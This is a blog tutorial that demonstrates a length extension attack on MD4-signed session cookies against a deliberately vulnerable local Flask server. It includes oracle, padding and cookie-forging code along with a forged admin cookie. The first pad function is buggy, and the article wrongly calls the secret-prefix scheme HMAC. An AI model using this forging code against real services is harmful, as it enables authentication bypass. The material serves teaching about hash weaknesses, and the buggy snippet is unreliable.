Length Extension Attack on MD4

Henrique Marcomini
Sinch Blog
Published in
7 min readApr 12, 2021

In this article we will exploit a vulnerable server and understand more about this type of vulnerability in MD4 (it works on SHA too). So grab your cup of coffee and let’s dive in.

Photo by Adi Perets from Pexels

So, what exactly are we going to do?

Today I will be exploring an old technique that allows us to forge the HMAC signature of some plaintext, even if we do not know the underlying secret.

Here we will be creating a simple vulnerable web server to be used as a target, and the code need to break it. This of course only happens in some scenarios where the signature is an HMAC and the hash algorithm used have some digest mechanism where we can feed its output as its initial state. If you want to see the full attack, just jump to the last part.

The Vulnerable Server

I will make this as simple as possible, so we can focus on the vulnerability itself. These are the definitions for our service:

  • Our web server will contain only two routes, / and /admin
  • In order to access /admin, you must me admin.
  • To be considered admin, you must provide a session cookie
  • The session cookie is composed of base64(username=string&is_admin=boolean).base64(md4(key+username=string&is_admin=boolean))
  • The key is not known to the user
  • To generate a new session token, one must login at /

With those definitions in mind, I came up with the following server in python using Flask

This web server generates a signature for the cookie and the only way to generate a new valid signature is to know my_secret, or so you would think.

Now I’ll present the pieces to solve our problem

Enter the oracle

An oracle in security is an entity that can give you an answer to a certain question.

In our case, the oracle will be the entity that answers this simple question, “Is my authentication token valid?” It may not sound like much, but oracles like this is what allows multiple cryptography attacks to work.

In our case, we can define the oracle using the following script:

import requestsdef oracle(val,sig):
cookie_jar = {'auth':val+'.'+sig}
r = requests.get("http://0.0.0.0:5000/admin",cookies=cookie_jar)
if "you sure look like a cheater" in r.text:
return False
return True

With the oracle, we have the first piece to solve this puzzle

And this vulnerability is brought by “The digestion of the MD4 is its inner state”

MD4 works by breaking the message in 512 bit chunks and putting it into a digesting routine. This digestion routine take two inputs, an IV and a block of data, and spill out another chunk of data.

The thing is that the chunk of data spilled out is the IV for the next block of data, so the output of the MD4 algorithm is in reality the inner state of the last digest step. Here, I’ve made a diagram for you

What this indicates is that we can grab the signature that our web server generated and append our data to it. I made another diagram just for you ;)

Oh boy those are loooooong diagrams

So, this is it? Just take the output and append data, can’t be that simple. Yeaah, it isn’t. I still need to talk about our last missing piece, the original messaging padding.

Understanding why we need the padding length

The idea of this attack is to extend the original data and create a new hash based on it. When I say the whole data, I mean with padding included.

If we were to hash the following sentence:

We would actually be hashing this sentence with the additional padding, so we are guaranteed to work with a block of 512 bits. The additional padding would be like the following image:

I painted the original data in blue and the padding in orange. The INT part is metadata telling the size of the hash as little endian 64 bits integer

So if we were to extend the original message, we would have to do it over the padding, like this:

Notice that the original pad becomes data in our extended data

So it becomes clear that to extend the original message, we just need to know the pad that comes after it. In some literature they will say that you need to discover the key length, but this is just another form of discovering the padding length

How do we get the padding length?

The padding length is the last thing we need now to discover, and to discover it is actually already part of the attack.

To find out the padding we will need two very important things:

  • Understand how the MD4 padding works
  • The oracle that we got at the beginning of the article (see, I told you it would be important)

The MD4 is simple enough. You just need to get the last 512bit block, append a single 1 bit, append 0s until you get to the bit 448. Then append the original message size as a 64bit little endian integer, and we are good to go.

I’ve made a simple function to calculate the padding supposing that data in composed of 8bit words:

import packdef pad(data):
size = len(data)
#if we cannot put the 1 and the size we create a new block
if size%64 == 0:
return data + b"\x128" + bytes(55) + struct.pack(">I",size)
if size%64 >= 56:
return data + b"\x128" + bytes(64-(size%64)+55) + struct.pack(">I",size)
return data+b"\x128" + bytes(64-(size%64)) + struct.pack(">I",size)

This of course can be more elegant, but it will serve for now. Now we just need to slap this together with our oracle, and it should work just fine.

Doing it by hand

Since this article is focused in learning (and hashpump does not implements transparently MD4) we are going to do it by hand. The first step is to find some implementation of MD4 in your language of choice, I’m going to be using python3, so I picked this implementation https://gist.github.com/kangtastic/c3349fc4f9d659ee362b12d7d8c639b6

There are some changes in order to make this work. I’ve extracted the padding routine into an external function. So the code becomes:

def __init__(self, msg=None):
""":param ByteString msg: The message to be hashed."""
if msg is None:
msg = b""
self.msg = msg
# Pre-processing: Total length is a multiple of 512 bits.
self.msg = MD4.pad(msg)
# Process the message in successive 512-bit chunks.
self._process([self.msg[i : i + 64] for i in range(0, len(self.msg), 64)])
@staticmethod
def pad(msg):
ml = len(msg) * 8
msg += b"\x80"
msg +=bytes(-(len(msg) + 8) % 64)
msg += struct.pack("<Q", ml)
return msg

The first thing that we need to do is to calculate the new signatures, here get_orginal_cookie is a function that make a post into the webserver and extract the values from the cookie

data, sign = get_original_cookie()#1
md4 = MD4()
md4.h = [struct.unpack("<I",sign[i*4:(i+1)*4])[0] for i in range(4)]
#2
data_to_append = b'X'*64+b'isAdmin=true'
data_to_append = md4.pad(data_to_append)[64:]
#3
md4.msg = data_to_append
md4._process([md4.msg[i : i + 64] for i in range(0, len(md4.msg), 64)])
new_sign = md4.bytes()

In #1 we are going to set the internal state of the MD4 as the signature we got from the server. This is equivalent to substituting MD4’s IV.

In #2 we generate the data_to_append, which is a full 512bit block + the string we want to append. Then we calculate the padding and throw away the first block (the [64:] throws away the first 64 bytes)

In #3 we set the MD4 to process the data we got in #2 and get the new signatures.

It is very important to understand that we did not need the first 64 bytes, since we already had its digest

Now that we have our new signature, we need to discover which key\padding length generates this digest. For that we are going to use our oracle that says if a pair of data-signature is valid.

done = False
key_size = 1
while not done:
#1
new_message = MD4.pad(b'X'*key_size+data)
#2
new_message += b'isAdmin=true'
new_message = new_message[key_size:]
#3
if oracle(b64encode(new_message), b64encode(new_sign)):
done = True
else:
key_size += 1
if key_size > 1024:
print("we probably got something wrong")
break
print("Your forged cookie is " + encode_cookie(b64encode(new_message), b64encode(new_sign)))

In #1 we try to recreate the original data that the web server signed, the important part for us is to guess the key size so we can guess the padding size.

In #2 we take our guess from #1 and append our admin flag. Then we remove the key from data, since the web server will append that for us.

In #3 we ask our oracle if our guess was the correct one. Once it succeeds we print the forged cookie. Since it is very unlikely that the key will be more than 1024 data long, I’ve put a restriction to stop the script too.

Once we run this script we should get the following output:

Your forged cookie is dXNlcm5hbWU9dGVzdIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAAAAAGlzQWRtaW49dHJ1ZQ==.ABHqD8i58/GcDTzFqNeU9Q==

If we submit this to the web server we will be greeted as admins

Yay

The full script is the following

That’s all folks

--

--

Henrique Marcomini
Sinch Blog

This is my company medium, everything write here is done in company time or using company resources. By the way I work at Sinch, a really cool company.